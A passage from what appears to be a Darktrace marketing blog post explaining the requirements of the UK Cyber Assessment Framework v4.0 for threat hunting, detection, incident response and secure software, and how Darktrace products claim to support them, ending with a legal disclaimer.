  • Maintenance of threat hunt  records and post-hunt analysis to drive improvements in the process and overall security posture;
  • Regular review of the threat hunting process to align with updated risks;
  • Leveraging automation for improvement, where appropriate;
  • Focus on threat tactics, techniques and procedures, rather than one-off indicators of compromise.

Traditionally, playbook creation has been a manual process — static, slow to amend, and limited by human foresight. Even automated SOAR playbooks tend to be stock templates that can’t cover the full spectrum of threats or reflect the specific context of your organisation.

CAF v4.0 sets the expectation that organisations should maintain documented, structured approaches to incident response. But Darktrace / Incident Readiness & Recovery goes further. Its AI-generated playbooks are bespoke to your environment and updated dynamically in real time as incidents unfold. This continuous refresh of “New Events” means responders always have the latest view of what’s happening, along with an updated understanding of the AI's interpretation based on real-time contextual awareness, and recommended next steps tailored to the current stage of the attack.

The result is far beyond checkbox compliance: a living, adaptive response capability that reduces investigation time, speeds containment, and ensures actions are always proportionate to the evolving threat.

3. Do you have a proactive security posture?

Cyber Assessment Framework v4.0 does not want organisations to detect threats, it expects them to anticipate and reduce cyber risk before an incident ever occurs. That is s why principle A2.b calls for a security posture that moves from reactive detection to predictive, preventative action.

A proactive security posture focuses on reducing the ease of the most likely attack paths in advance and reducing the number of opportunities an adversary has to succeed in an attack.

To meet this requirement, organisations could benefit in looking for solutions that can:

  • Continuously map the assets and users most critical to operations;
  • Identify vulnerabilities and misconfigurations in real time;
  • Model likely adversary behaviours and attack paths using frameworks like MITRE ATT&CK; and  
  • Prioritise remediation actions that will have the highest impact on reducing overall risk.

When done well, this approach creates a real-time picture of your security posture, one that reflects the dynamic nature and ongoing evolution of both your internal environment and the evolving external threat landscape. This enables security teams to focus their time in other areas such as  validating resilience through exercises such as red teaming or forecasting.

4. Can your team/tools customize detection rules and enable autonomous responses?

CAF v4.0 places greater emphasis on reducing false positives and acting decisively when genuine threats are detected.  

The framework highlights the need for customisable detection rules and, where appropriate, autonomous response actions that can contain threats before they escalate:

The following new requirements are included:  

  • C1.c.: Alerts and detection rules should be adjustable to reduce false positives and optimise responses. Custom tooling and rules are used in conjunction with off the shelf tooling and rules;
  • C1.d: You investigate and triage alerts from all security tools and take action – allowing for improvement and prioritization of activities;
  • C1.e: Monitoring and detection personnel have sufficient understanding of operational context and deal with workload effectively as well as identifying areas for improvement (alert or triage fatigue is not present);
  • C2.a: Threat hunts should be turned into automated detections and alerting where appropriate and automation should be leveraged to improve threat hunting.

Tailored detection rules improve accuracy, while automation accelerates response, both of which help satisfy regulatory expectations. Cyber AI Analyst allows for AI investigation of alerts and can dramatically reduce the time a security team spends on alerts, reducing alert fatigue, allowing more time for strategic initiatives and identifying improvements.

5. Is your software secure and supported?  

CAF v4.0 introduced a new principle which requires software suppliers to leverage an established secure software development framework. Software suppliers must be able to demonstrate:  

  • A thorough understanding of the composition and provenance of software provided;  
  • That the software development lifecycle is informed by a detailed and up to date understanding of threat; and  
  • They can attest to the authenticity and integrity of the software, including updates and patches.  

Darktrace is committed to secure software development and all Darktrace products and internally developed systems are developed with secure engineering principles and security by design methodologies in place. Darktrace commits to the inclusion of security requirements at all stages of the software development lifecycle. Darktrace is ISO 27001, ISO 27018 and ISO 42001 Certified – demonstrating an ongoing commitment to information security, data privacy and artificial intelligence management and compliance, throughout the organisation.  

6. Is your incident response plan built on a true understanding of your environment and does it adapt to changes over time?

CAF v4.0 raises the bar for incident response by making it clear that a plan is only as strong as the context behind it. Your response plan must be shaped by a detailed, up-to-date understanding of your organisation’s specific network, systems, and operational priorities.

The framework’s updates emphasise that:

  • Plans must explicitly cover the network and information systems that underpin your essential functions because every environment has different dependencies, choke points, and critical assets.
  • They must be readily accessible even when IT systems are disrupted ensuring critical steps and contact paths aren’t lost during an incident.
  • They should be reviewed regularly to keep pace with evolving risks, infrastructure changes, and lessons learned from testing.

From government expectation to strategic advantage

Cyber Assessment Framework v4.0 signals a powerful shift in cybersecurity best practice. The newest version sets a higher standard for detection performance, risk management, threat hunting software development and proactive security posture.

For Darktrace, this is validation of the approach we have taken since the beginning: to go beyond rules and signatures to deliver proactive cyber resilience in real-time.

-----

Disclaimer:

This document has been prepared on behalf of Darktrace Holdings Limited. It is provided for information purposes only to provide prospective readers with general information about the Cyber Assessment Framework (CAF) in a cyber security context. It does not constitute legal, regulatory, financial or any other kind of professional advice and it has not been prepared with the reader and/or its specific organisation’s requirements in mind. Darktrace offers no warranties, guarantees, undertakings or other assurances (whether express or implied)  that: (i) this document or its content are  accurate or complete; (ii) the steps outlined herein will guarantee compliance with CAF; (iii) any purchase of Darktrace’s products or services will guarantee compliance with CAF; (iv) the steps outlined herein are appropriate for all customers. Neither the reader nor any third party is entitled to rely on the contents of this document when making/taking any decisions or actions to achieve compliance with CAF. To the fullest extent permitted by applicable law or regulation, Darktrace has no liability for any actions or decisions taken or not taken by the reader to implement any suggestions contained herein, or for any third party products, links or materials referenced. Nothing in this document negates the responsibility of the reader to seek independent legal or other advice should it wish to rely on any of the statements, suggestions, or content set out herein.  

The cybersecurity landscape evolves rapidly, and blog content may become outdated or superseded. We reserve the right to update, modify, or remove any content without notice.

Continue reading
About the author
Mariana Pereira
VP, Field CISO
Your data. Our AI.
Elevate your network security with Darktrace AI